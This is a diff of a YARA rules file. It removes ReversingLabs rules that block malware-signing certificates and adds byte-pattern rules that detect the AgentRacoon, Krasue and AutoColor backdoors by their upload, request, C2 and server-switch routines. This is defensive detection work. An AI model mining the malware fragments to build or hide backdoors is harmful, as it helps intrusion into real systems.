+		uint32( 0 ) == 0x464C457F and ( ( ( $network_communication_v1 ) and ( $send_system_information_v1 ) and ( all of ( $download_file_v1_p* ) ) ) or ( ( $network_communication_v2 ) and ( all of ( $download_file_v2_p* ) ) and ( $send_system_information_v2 ) ) or ( ( $network_communication_v3 ) and ( $get_mac_address_v3 ) and ( all of ( $download_file_v3_p* ) ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_F4D2Def53Bccb0Dd2B7D54E4853A2Fc5 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Agentracoon : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects AgentRacoon backdoor."
 		author = "ReversingLabs"
-		id = "3c1bec34-9eac-5c7c-bb36-2e24b6ee52dc"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "ad74d530-ffbd-589f-b941-3a5d9ec737b6"
+		date = "2023-12-15"
+		modified = "2023-12-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4742-L4760"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/ByteCode.MSIL.Backdoor.AgentRacoon.yara#L1-L128"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9991f44b8e984bd79269c44999481258d94bec9c21b154b63c6c30ae52344b3c"
+		logic_hash = "3ba73f19f59c2e5880df820c52f16997047d7299eb14d421ae2ed8f3790bcfe9"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "AgentRacoon"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$unpack_response_p1 = {
+            17 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 18 91 9C 11 ?? 73 ?? ?? ?? ?? 0A 06 16 6F ?? ??
+            ?? ?? 2D ?? 73 ?? ?? ?? ?? 7A 17 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 19 91 9C 11 ?? 73
+            ?? ?? ?? ?? 0A 06 1A 6F ?? ?? ?? ?? 2C ?? 06 1B 6F ?? ?? ?? ?? 2C ?? 06 1C 6F ?? ??
+            ?? ?? 2C ?? 06 1D 6F ?? ?? ?? ?? 2C ?? 73 ?? ?? ?? ?? 7A 1F ?? 0B 2B ?? 07 17 58 0B
+            03 07 91 2D ?? 07 17 58 0B 03 8E 69 07 59 0C 08 8D ?? ?? ?? ?? 0D 03 07 09 16 08 28
+            ?? ?? ?? ?? 1A 13 ?? 2B ?? 11 ?? 17 58 13 ?? 09 11 ?? 91 2D ?? 11 ?? 17 58 13 ?? 09
+            8E 69 11 ?? 59 0C 08 8D ?? ?? ?? ?? 13 ?? 09 11 ?? 11 ?? 16 08 28 ?? ?? ?? ?? 02 12
+            ?? FE 15 ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ??
+            7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ??
+            ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ??
+            ?? 12 ?? 07 1F ?? 59 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ??
+            ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 11 ?? 1A 59 8D ?? ?? ?? ?? 7D ??
+            ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ??
+            ?? 12 ?? 1A 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 11
+            ?? 7D ?? ?? ?? ?? 03 16 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 18
+        }
+		$unpack_response_p2 = {
+            02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1A 02 7C ?? ?? ?? ?? 7B ??
+            ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1C 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ??
+            ?? ?? 03 1E 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1F ?? 02 7C ??
+            ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1F ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ??
+            ?? 16 07 1F ?? 59 28 ?? ?? ?? ?? 09 16 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ??
+            ?? ?? ?? 09 18 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 09 1A 02 7C ??
+            ?? ?? ?? 7B ?? ?? ?? ?? 16 11 ?? 1A 59 28 ?? ?? ?? ?? 11 ?? 16 02 7C ?? ?? ?? ?? 7B
+            ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 11 ?? 18 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28
+            ?? ?? ?? ?? 11 ?? 1A 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 1A 28 ?? ?? ?? ?? 11 ?? 1E
+            02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 02 7C ??
+            ?? ?? ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 1F ?? 91 13 ?? 02 7C ?? ?? ?? ?? 11 ??
+            8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 11 ?? 1F ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 11 ??
+            28 ?? ?? ?? ?? 2A
+        }
+		$upload = {
+            28 ?? ?? ?? ?? 0A 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 2D ?? DD ?? ?? ?? ?? 16 0B 38 ??
+            ?? ?? ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 0C 06 02 7C ?? ?? ?? ??
+            7B ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 02 7C ?? ?? ?? ??
+            7B ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 72 ?? ?? ?? ?? A2 11 ?? 17 02 7C ??
+            ?? ?? ?? 7B ?? ?? ?? ?? 07 6F ?? ?? ?? ?? A2 11 ?? 18 72 ?? ?? ?? ?? A2 11 ?? ?? 06
+            A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7C ?? ?? ?? ??
+            7B ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 07
+            14 6F ?? ?? ?? ?? 07 17 58 0B 07 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 3F
+            ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 73 ??
+            ?? ?? ?? 7D ?? ?? ?? ?? DE 23 0D 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09
+            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 2A
+        }
+		$perform_request = {
+            05 6F ?? ?? ?? ?? 0A 06 04 3D ?? ?? ?? ?? 06 04 19 5B 18 5A 3F ?? ?? ?? ?? 05 16 06
+            19 5B 6F ?? ?? ?? ?? 0B 05 06 19 5B 06 19 5B 6F ?? ?? ?? ?? 0C 05 06 19 5B 18 5A 6F
+            ?? ?? ?? ?? 0D 02 07 28 ?? ?? ?? ?? 0B 02 08 28 ?? ?? ?? ?? 0C 02 09 28 ?? ?? ?? ??
+            0D 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 A2 11 ?? 17 72 ?? ?? ?? ?? A2 11 ?? 18 07
+            A2 11 ?? 19 72 ?? ?? ?? ?? A2 11 ?? 1A 08 A2 11 ?? 1B 72 ?? ?? ?? ?? A2 11 ?? 1C 09
+            A2 11 ?? 1D 72 ?? ?? ?? ?? A2 11 ?? 1E 02 28 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ??
+            ?? A2 11 ?? 1F ?? 02 7B ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 10 ?? 38 ?? ?? ?? ?? 06
+            04 19 5B 18 5A 3D ?? ?? ?? ?? 06 04 19 5B 3F ?? ?? ?? ?? 05 16 06 18 5B 6F ?? ?? ??
+            ?? 13 ?? 05 06 18 5B 6F ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 13 ?? 02 11 ?? 28
+            ?? ?? ?? ?? 13 ?? 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 A2 11 ?? 17 72 ?? ?? ?? ??
+            A2 11 ?? 18 11 ?? A2 11 ?? 19 72 ?? ?? ?? ?? A2 11 ?? 1A 11 ?? A2 11 ?? 1B 72 ?? ??
+            ?? ?? A2 11 ?? 1C 02 28 ?? ?? ?? ?? A2 11 ?? 1D 72 ?? ?? ?? ?? A2 11 ?? 1E 02 7B ??
+            ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 10 ?? 2B ?? 02 05 28 ?? ?? ?? ?? 13 ?? 1D 8D ?? ??
+            ?? ?? 13 ?? 11 ?? 16 03 A2 11 ?? 17 72 ?? ?? ?? ?? A2 11 ?? 18 11 ?? A2 11 ?? 19 72
+            ?? ?? ?? ?? A2 11 ?? 1A 02 28 ?? ?? ?? ?? A2 11 ?? 1B 72 ?? ?? ?? ?? A2 11 ?? 1C 02
+            7B ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 10 ?? 05 2A
+        }
+		$get_txt_record = {
+            14 0A 03 73 ?? ?? ?? ?? 0B 07 6F ?? ?? ?? ?? 0C 7E ?? ?? ?? ?? 1F ?? 73 ?? ?? ?? ??
+            0D 09 08 08 8E 69 6F ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            09 12 ?? 6F ?? ?? ?? ?? 13 ?? 09 6F ?? ?? ?? ?? 07 11 ?? 6F ?? ?? ?? ?? 07 6F ?? ??
+            ?? ?? 13 ?? 28 ?? ?? ?? ?? 12 ?? 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? DE ?? 26 72 ??
+            ?? ?? ?? 13 ?? DE ?? 11 ?? 2A
+        }
+		$main_loop = {
+            73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ??
+            ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 18 16 16 6F ?? ?? ?? ?? 0A 06 28
+            ?? ?? ?? ?? 2D ?? 2A 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 2A 7E ?? ??
+            ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 07 6F ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 12 ?? 7B ?? ?? ?? ?? 0D 12 ?? 7B
+            ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 7E ?? ?? ?? ?? 19 11 ?? 11 ??
+            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 14 80 ?? ?? ?? ?? 2A 11 ?? 7E ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 11 ?? 17 58 13 ?? 11 ?? 09 32 ?? 7E ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0B 73 ??
+            ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 07
+            17 6F ?? ?? ?? ?? 13 ?? 11 ?? 7E ?? ?? ?? ?? 1A 16 16 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
+            11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DD ?? ?? ?? ?? 26 DE ?? 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PETROYL GROUP, TOV" and ( pe.signatures [ i ] . serial == "00:f4:d2:de:f5:3b:cc:b0:dd:2b:7d:54:e4:85:3a:2f:c5" or pe.signatures [ i ] . serial == "f4:d2:de:f5:3b:cc:b0:dd:2b:7d:54:e4:85:3a:2f:c5" ) and 1598347687 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $unpack_response_p* ) ) and ( $upload ) and ( $perform_request ) and ( $get_txt_record ) and ( $main_loop )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_03Bf9Ef4Cf037A2385649026C3Da9D3E : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_Krasue : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Krasue backdoor."
 		author = "ReversingLabs"
-		id = "d7396af1-2eae-594a-9933-3d148503c0ea"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "3187eebf-ef70-585f-85cf-5813025c785e"
+		date = "2024-03-04"
+		modified = "2024-03-04"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4762-L4778"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.Krasue.yara#L1-L127"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "14196bad586b1349e6e8a1eb5621ce0d8d346ff8021c8ef80804de1533fd40d9"
+		logic_hash = "e2daa35ef9e0793062c9fb3bd8e4838e1e81ee3d228d8117b1c3b0e72eb8e151"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "Krasue"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "COLLECTIVE SOFTWARE INC." and pe.signatures [ i ] . serial == "03:bf:9e:f4:cf:03:7a:23:85:64:90:26:c3:da:9d:3e" and 1595371955 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_790177A54209D55560A55Db97C5900D6 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "cc49f477-269a-55af-8344-39d2f24c1e7f"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4780-L4796"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "07c8e21fe604b481beebae784eb49e32bebee70e749581a55313bfbc757752e2"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$switch_server = {
+            8B 05 ?? ?? ?? ?? FF C0 3B 05 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 7C ?? C7 05 ?? ?? ?? ??
+            ?? ?? ?? ?? 48 63 05 ?? ?? ?? ?? 85 C0 75 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B
+            15 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? C6 05 ?? ?? ?? ??
+            ?? 89 15 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 66 89 15 ?? ?? 23 00 48 8B 04 C5 ?? ?? ?? ??
+            66 C7 05 ?? ?? 23 00 ?? ?? 8B 10 89 15 ?? ?? ?? ?? 66 8B 40 ?? 66 89 05 ?? ?? 23 00
+            C3
+        }
+		$get_hostname = {
+            41 55 41 54 31 F6 55 53 31 C0 BF ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
+            C0 0F 88 ?? ?? ?? ?? 48 89 E6 89 C7 89 C3 E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 45 31 C9 31
+            FF 41 89 D8 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 41 89 EC 48 63 ED 48 89 EE E8 ?? ?? ?? ??
+            BE ?? ?? ?? ?? 48 89 C7 49 89 C5 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 48 63 D0 49 8D 74 15
+            ?? 8D 50 ?? 48 63 D2 44 39 E2 41 89 D0 7D ?? 48 FF C2 41 80 7C 15 ?? ?? 75 ?? 44 89
+            C1 41 FF C8 BA ?? ?? ?? ?? 29 C1 4D 63 C0 48 89 D7 83 E9 ?? 48 63 C9 F3 A4 41 C6 80
+            ?? ?? ?? ?? ?? 4C 89 EF 48 89 EE E8 ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? 48 81 C4 ?? ??
+            ?? ?? 5B 5D 41 5C 41 5D C3
+        }
+		$start_server_p1 = {
+            41 57 41 56 31 D2 41 55 41 54 BE ?? ?? ?? ?? 55 53 89 FB BF ?? ?? ?? ?? 48 81 EC ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 89 05 ?? ?? ?? ?? 79 ?? 83 CF ?? E9 ?? ?? ?? ?? 48 8D
+            4C 24 ?? 41 B8 ?? ?? ?? ?? BE ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C7 C7 44 24 ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 48 89 D7 F3 AB 31 FF 66 C7 05
+            ?? ?? 23 00 ?? ?? E8 ?? ?? ?? ?? 0F B7 FB 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 3D ??
+            ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 66 89 05 ?? ?? 23 00 E8 ?? ?? ?? ?? 85 C0 78
+            ?? 4C 8D A4 24 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ?? ?? 4C 8D 74 24 ?? C7 05 ?? ?? ?? ??
+            ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 31 C9 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ??
+            ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 48 89 C3 0F 88 ?? ?? ?? ?? 31 C0 B9 ?? ?? ??
+            ?? 4C 89 E7 83 FB ?? F3 AB 7E ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ??
+            ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 44 8D 08 31 C9 BA
+            ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 83 FB ?? 75 ?? BE ?? ?? ?? ?? 4C 89
+            E7 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 05 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 05
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 89 DA BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 E6 89
+            C2 8A 06 89 F5 44 29 E5 3C ?? 75 ?? 80 7E ?? ?? 75 ?? 48 83 C6 ?? EB ?? 3C ?? 75 ??
+            80 7E ?? ?? 75 ?? 41 B8 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 4C 89 C7 4C 8B 05 ?? ?? ??
+            ?? F3 AB 8B 7E ?? 66 8B 4E ?? 4C 89 06 C6 06 ?? 45 31 C0 C6 46 ?? ?? BE
+        }
+		$start_server_p2 = {
+            66 C7 05 ?? ?? 23 00 ?? ?? 89 3D ?? ?? ?? ?? 66 89 0D ?? ?? 23 00 89 3D ?? ?? ?? ??
+            66 89 0D ?? ?? 23 00 48 89 F7 B9 ?? ?? ?? ?? 4C 89 E6 F3 AB E9 ?? ?? ?? ?? 85 ED 75
+            ?? 48 63 DD BA ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 01 E3 48 89 DF E8 ?? ?? ?? ?? 85 C0 75
+            ?? 48 8D 7B ?? E8 ?? ?? ?? ?? 6B C0 ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 89 EF 99 F7
+            F9 31 C0 E8 ?? ?? ?? ?? EB ?? 8D 45 ?? 48 8D 54 24 ?? 48 98 85 C0 78 ?? 49 8B 0C 04
+            48 83 C2 ?? 48 83 E8 ?? 48 89 4A ?? C6 42 ?? ?? C6 42 ?? ?? EB ?? BA ?? ?? ?? ?? BE
+            ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 05 ?? ?? ?? ?? 89 E9 4C 89 F6
+            89 2D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? B8 ?? ?? ?? ??
+            48 89 C7 F3 A4 BE ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? 31 C0 48 83 C9 ?? 4C 89 EF F2
+            AE 48 89 C8 48 F7 D0 48 8D 50 ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89
+            DF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 44 8B 0D ?? ?? ?? ?? 44
+            8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 4C 24 ?? 44 89 4C 24 ?? E8 ?? ?? ?? ?? 48 83
+            EC ?? 41 89 C0 BA ?? ?? ?? ?? 8B 4C 24 ?? 4C 89 EF BE ?? ?? ?? ?? 31 C0 51 8B 0D ??
+            ?? ?? ?? 41 57 53 44 8B 4C 24 ?? E8 ?? ?? ?? ?? 31 C0 48 83 C9 ?? 4C 89 EF F2 AE 48
+            83 C4 ?? 48 89 C8 48 F7 D0 48 8D 50 ?? 41 89 E8 4C 89 F1 4C 89 EE 8B 3D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8
+        }
+		$start_server_p3 = {
+            85 C0 75 ?? 31 FF E8 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ??
+            ?? 85 C0 75 ?? BF ?? ?? ?? ?? EB ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ??
+            ?? ?? 85 C0 75 ?? BF ?? ?? ?? ?? EB ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ??
+            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 89 C7 E8 ?? ?? ?? ?? 45 85 FF 0F
+            85 ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 41 89 C4 75 ?? 8B
+            7C 24 ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? BE ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8D 4B ?? 45 31 C0 BA ?? ?? ??
+            ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 7C 24 ?? E8
+            ?? ?? ?? ?? 8B 7C 24 ?? 48 8D B4 24 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
+            89 C3 7E ?? 4C 8D AC 24 ?? ?? ?? ?? 8D 04 2B 3D ?? ?? ?? ?? 7E ?? 8B 3D ?? ?? ?? ??
+            BA ?? ?? ?? ?? 48 8D 4C 24 ?? 4C 89 EE 29 EA 41 89 E8 49 81 C5 ?? ?? ?? ?? 81 EB ??
+            ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 48 8D 4C 24 ?? 41 89 E8 89 DA 4C 89
+            EE E8 ?? ?? ?? ?? EB ?? 31 F6 BA ?? ?? ?? ?? 44 89 E7 E8 ?? ?? ?? ?? 85 C0 0F 85
+        }
+		$send_encrypt = {
+            E8 ?? ?? ?? ?? 41 8D 7E ?? 49 89 C5 48 63 FF E8 ?? ?? ?? ?? 48 63 54 24 ?? 48 89 C7
+            4C 89 FE 48 8D 0C 13 C6 04 08 ?? 89 D1 48 01 C2 F3 A4 48 89 D7 48 89 EE 48 89 D9 44
+            89 F2 F3 A4 48 89 C6 EB ?? 8D 7B ?? 48 63 FF E8 ?? ?? ?? ?? 89 DA 49 89 C5 48 89 EE
+            4C 89 EF E8 ?? ?? ?? ?? 44 8B 0D ?? ?? ?? ?? 4C 89 EE 44 89 E7 48 63 D0 41 B8 ?? ??
+            ?? ?? 31 C9 E8 ?? ?? ?? ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+        }
+		$notify_server = {
+            48 81 EC ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 48 89 E0 85 D2 7E ?? BE ?? ?? ?? ?? 89 D1 48
+            89 E7 F3 A4 48 63 D2 BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 4C 8D 04 10 41 B9 ?? ?? ?? ?? 48
+            83 C2 ?? 4C 89 C7 41 B8 ?? ?? ?? ?? F3 A4 8B 3D ?? ?? ?? ?? 48 89 C6 E8 ?? ?? ?? ??
+            8B 05 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MAK GmbH" and pe.signatures [ i ] . serial == "79:01:77:a5:42:09:d5:55:60:a5:5d:b9:7c:59:00:d6" and 1594080000 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( $switch_server ) and ( $get_hostname ) and ( all of ( $start_server_p* ) ) and ( $send_encrypt ) and ( $notify_server )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_048F7B5F67D8E2B3030F75Eb7Be2713D : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_Autocolor : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects AutoColor backdoor."
 		author = "ReversingLabs"
-		id = "e746516a-c51f-5cb8-8157-a5fe1f2c7abe"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "c6fea724-bd3d-56a0-a8c1-2e4d2e549766"
+		date = "2025-04-11"
+		modified = "2025-04-11"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4798-L4814"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.AutoColor.yara#L1-L177"
